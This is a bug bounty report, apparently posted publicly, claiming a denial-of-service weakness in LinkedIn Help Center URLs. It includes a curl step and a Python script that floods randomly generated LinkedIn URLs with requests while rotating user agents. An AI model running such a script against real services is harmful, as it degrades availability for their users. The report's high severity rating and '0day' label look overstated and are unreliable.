HelpOut

Ddos resources exhaustion for LinkedIn help center

Here's the first report: Double Barrel 0day

---

Bug Bounty Report

Title: Potential DoS Vulnerability in LinkedIn Help Center URLs Due to Improper URL Handling

Report Date: August 28, 2024

Reporter: Blu Corbel AKA DeadmanXXXII

Program: LinkedIn Bug Bounty Program

---

Summary:

I have discovered a potential Denial of Service (DoS) vulnerability in LinkedIn's Help Center URL handling mechanism. By altering the last 7 characters of certain Help Center URLs, the server consistently returns a status code of 200 OK for URLs that do not actually exist. This behavior can be exploited to perform a DoS attack by generating and requesting numerous random URLs, overwhelming LinkedIn's servers.

Impact:

The vulnerability allows an attacker to flood LinkedIn's servers with legitimate-looking requests that consume resources, potentially degrading service performance or leading to a full-scale outage. Such an attack could disrupt the availability of LinkedIn's Help Center and other related services.

CVSS Score:

• CVSS Version: 3.1
• CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
• Base Score: 8.6 (High)

CWE ID:

• CWE-400: Uncontrolled Resource Consumption ('Resource Exhaustion')

---

Steps to Reproduce:

1. Start with the base LinkedIn Help Center URL: https://www.linkedin.com/help/linkedin/answer/a1341680
2. Modify the last 7 characters of the URL with any random digits or characters, for example: https://www.linkedin.com/help/linkedin/answer/a1041689.
3. Use curl or any HTTP client to make a request to the generated URL:

   curl -I https://www.linkedin.com/help/linkedin/answer/a1041689

4. Observe that the server consistently returns a 200 OK status code along with valid content, even for URLs that do not exist.

Proof of Concept (PoC) Script: HelpOut.py

The following Python script, named HelpOut.py, demonstrates how an attacker might exploit this vulnerability by generating random URLs and sending requests with varying user agents.

import requests
import random
import string
import time

# Base URL for LinkedIn Help Center
base_url = "https://www.linkedin.com/help/linkedin/answer/a"

# Random User Agents
user_agents = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.3 Safari/605.1.15",
    "Mozilla/5.0 (Linux; Android 11; SM-G998B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Mobile Safari/537.36",
    "Mozilla/5.0 (iPhone; CPU iPhone OS 15_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Mobile/15E148 Safari/604.1"
]

def generate_random_url(base):
    # Generate a random 7-character alphanumeric string
    random_chars = ''.join(random.choices(string.ascii_lowercase + string.digits, k=7))
    return base + random_chars

def send_request(url):
    # Choose a random User Agent
    headers = {
        "User-Agent": random.choice(user_agents)
    }
    response = requests.head(url, headers=headers)
    print(f"Requested URL: {url} | Status Code: {response.status_code}")

# Generate and request random URLs
for _ in range(1000):  # Modify this number to increase/decrease the number of requests
    random_url = generate_random_url(base_url)
    send_request(random_url)
    time.sleep(0.1)  # Pause between requests to simulate more realistic traffic

---

Mitigation Recommendations:

1. Implement Rate Limiting: Enforce rate limits on incoming requests to prevent abuse by automated scripts and bots.
2. Return Proper Error Codes: Ensure that only valid resources return a 200 OK status code. Non-existent or unauthorized resources should return appropriate error codes like 404 Not Found.
3. Request Throttling: Apply throttling mechanisms on repetitive and identical requests to prevent resource exhaustion.
4. Response Caching: Implement caching mechanisms to avoid reprocessing identical requests, thus reducing the load on servers.

Business Impact:

If exploited, this vulnerability can cause severe service disruptions, affecting user access to LinkedIn Help Center resources and potentially leading to widespread dissatisfaction among users. Furthermore, the attack can compromise LinkedIn's reputation for reliability and security.

---

Additional Information:

• LinkedIn Help Center URLs: This issue appears to be specific to certain LinkedIn Help Center URLs. However, further investigation might reveal similar vulnerabilities in other areas of the platform.
• Server Behavior: The consistent 200 OK response, regardless of the validity of the resource, suggests that the backend server may not be verifying the existence of the requested resource, leading to unnecessary processing.

---

Please review the findings and consider implementing the recommended mitigations to protect LinkedIn's infrastructure from potential abuse. I am happy to provide further clarification or assist with any testing as needed.

Blu Corbel AKA DeadmanXXXII

---